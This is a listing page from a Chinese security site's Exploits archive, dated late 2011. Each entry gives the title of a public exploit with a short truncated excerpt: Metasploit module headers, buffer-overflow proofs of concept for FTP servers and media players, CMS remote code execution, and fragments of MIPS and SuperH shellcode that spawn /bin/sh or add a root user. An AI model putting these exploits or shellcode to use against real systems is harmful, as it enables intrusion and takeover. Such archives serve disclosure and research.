首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Serv-U FTP Server <4.2 Buffer Overflow
  日期:2011-12-02 10:55:48 点击:188 评论:0
### $Id$##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/f
IBM Lotus Domino Server Controller Authentication Bypass Vulnerability
  日期:2011-12-01 13:41:39 点击:152 评论:0
# Exploit Title: IBM Lotus Domino Controller auth. bypass # Date:30/11/2011 # Author: Alexey Sintsov # Software Link: http://www.ibm.com/ # Version:8.5.3/8.5.2 FP3 (0day)nbsp; # Tested on: Windows 7 / Windows 2008 # CVE :nbsp;CVE-2011-1519 Applicati
CCMPlayer 1.5 Stack based Buffer Overflow SEH Exploit (.m3u)
  日期:2011-12-01 13:40:01 点击:41 评论:0
# Exploit: CCMPlayer 1.5 Stack based Buffer Overflow SEH Exploit (.m3u) # Date: 30 Nov 2011 # Author: Rh0 # Software: CCMPlayer 1.5 # Tested on: Windows XP SP3 32-Bit EN (VirtualBox) require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = N
MS11-080 Afd.sys Privilege Escalation Exploit
  日期:2011-12-01 13:36:09 点击:98 评论:0
################################################################################ ######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ######## ######### Author: ryujin@offsec.com - Matteo Memelli ######## ######### Spaghetti Pwnsa
GOM Player 2.1.33.5071 ASX File Unicode Stack Buffer Overflow Exploit
  日期:2011-12-01 13:35:12 点击:99 评论:0
# Exploit Title: GOM Player Crafted ASX File Unicode Stack Buffer Overflow and Arbitrary Code Execution. # Version: 2.1.33.5071 # Date: 30-11-2011 # Author: Debasish Mandal Peter Van Eeckhoutte (corelanc0d3r) # Email : debasishm89@gmail.com # Softwa
Bugbear FlatOut 2005 Malformed .bed file Buffer Overflow Vulnerability
  日期:2011-12-01 13:34:14 点击:34 评论:0
#Exploit Title: FlatOut Malformed .bed file Buffer Overflow # Date: 11-29-11 # Author: Silent Dream # Software Link: http://www.gog.com/en/gamecard/flatout # Version: Latest # Tested on: Windows 7 #Tested on GOG.com copy of FlatOut. Exception offset
CTEK SkyRouter 4200 and 4300 Command Execution
  日期:2011-12-01 13:33:32 点击:48 评论:0
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framewo
Java Applet Rhino Script Engine Remote Code Execution
  日期:2011-12-01 13:30:25 点击:127 评论:0
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framewo
Serv-U FTP Server Jail Break
  日期:2011-12-01 13:27:20 点击:38 评论:0
I m better than TESO!CONFIDENTIAL SOURCE MATERIALS![*]----------------------------------------------------[*]Serv-U FTP Server Jail Break 0dayDiscovered By KingcopeYear 2011[*]----------------------------------------------------[*]Affected:220 Serv-
Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit
  日期:2011-11-29 11:37:57 点击:49 评论:0
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=00 _ __ __ __ 11 /' __ /'__` / __ /'__` 00 /_, ___ /_/_ ___ ,_/ / _ ___ 11 /_/ /' _ ` / /_/___ /'___ / /`'__ 00 / /
Titan FTP Server 8.40 DoS Kernel Crash
  日期:2011-11-28 12:08:06 点击:56 评论:0
#!/usr/bin/python## Exploit Title : Titan FTP Server 8.40 DoS Kernel Crash# Date: 25/11/2011# Author: Houssam Sahli# Software Link (trial version) : http://southrivertech.com/software/demosoft/titanftp.exe# Version: 8.40# Developed by : South River
Android 'content://' URI Multiple Information Disclosure Vulnerabilities
  日期:2011-11-28 12:05:25 点击:63 评论:0
?php /* * Description: Android 'content://' URI Multiple Information Disclosure Vulnerabilities * Bugtraq ID: 48256 * CVE: CVE-2010-4804 * Affected: Android 2.3.4 * Author: Thomas Cannon * Discovered: 18-Nov-2010 * Advisory: http://thomascannon.net/
Linux/MIPS - add user(UID 0) with password - 164 bytes
  日期:2011-11-28 12:04:48 点击:112 评论:0
/* Title: Linux/MIPS -add user(UID 0) with password - 164 bytes * Date: 2011-11-24 * Author: rigan - imrigan [at] gmail.com * Note: * Username - rOOt * Password - pwn3d */ #include stdio.h char sc[] = x24x09x73x50 // li t1,29520 x05x30xffxff
Linux/MIPS - execve /bin/sh - 48 bytes
  日期:2011-11-28 12:04:10 点击:60 评论:0
/* Title: Linux/MIPS - execve /bin/sh - 48 bytes Date: 2011-11-24 Author: rigan - imrigan [at] gmail.com .text .global __start __start: slti $a2, $zero, -1 li $t7, 0x2f2f6269 sw $t7, -12($sp) li $t6, 0x6e2f7368 sw $t6, -8($sp) sw $zero, -4($sp) la $
linux/mips XOR Shellcode Encoder (60 Bytes)
  日期:2011-11-28 12:03:16 点击:54 评论:0
#include fcntl.h#include stdio.h#include unistd.h#include sys/types.h#include sys/stat.h#include stdlib.h#include string.h #define DEBUG 0 /* * * entropy [at] phiral.net * mips (linux) shellcode xor encoder * * xABxCD is overwritten with jmp back
XChat Heap Overflow DoS
  日期:2011-11-28 12:00:22 点击:30 评论:0
#!/usr/bin/python # Exploit Title: XChat Heap Overflow DoS Proof of Concept # Date: June 2011 # Author: th3p4tri0t # Software Link: http://xchat.org/ # Version: = 2.8.9 # This only works on XChat on KDE, I'm not sure about windows. # It has been tes
shellcode - Linux/SuperH - sh4 - setuid(0) ; execve("/bin/sh", NULL, NULL) - 27
  日期:2011-11-25 10:42:54 点击:90 评论:0
/* Linux/SuperH - sh4 - setuid(0) ; execve(/bin/sh, NULL, NULL) - 27 bytes Tested on debian-sh4 2.6.32-5-sh7751r by Jonathan Salwan - twitter: @jonathansalwan 400054: 17 e3 mov #23,r3 400056: 4a 24 xor r4,r4 400058: 0b c3 trapa #11 40005a: 3a 23 xor
Log1CMS 2.0 (ajax_create_folder.php) Remote Code Execution
  日期:2011-11-25 10:42:02 点击:37 评论:0
?php /* +-----------------------------------------------------------+ + Log1CMS 2.0(ajax_create_folder.php) Remote Code Execution + +-----------------------------------------------------------+ Web-App : Log1CMS 2.0 Vendor : http://log1cms.sourcefor
PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit
  日期:2011-11-25 10:41:04 点击:65 评论:0
?php /* ------------------------------------------------------------- PmWiki = 2.2.34 (pagelist) Remote PHP Code Injection Exploit ------------------------------------------------------------- author...............: Egidio Romano aka EgiX mail......
A6-CMS(ACMS) 5.30 (ajax_create_folder.php) Remote Code Execution
  日期:2011-11-25 10:40:30 点击:35 评论:0
?php/*+------------------------------------------------------------------++ A6-CMS(ACMS) 5.30 (ajax_create_folder.php) Remote Code Execution + +------------------------------------------------------------------+ Web-App : A6-CMS(ACMS) 5.30Vendor : h
共637页/12733条记录 首页 上一页 [262] [263] [264] 265 [266] [267] [268] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved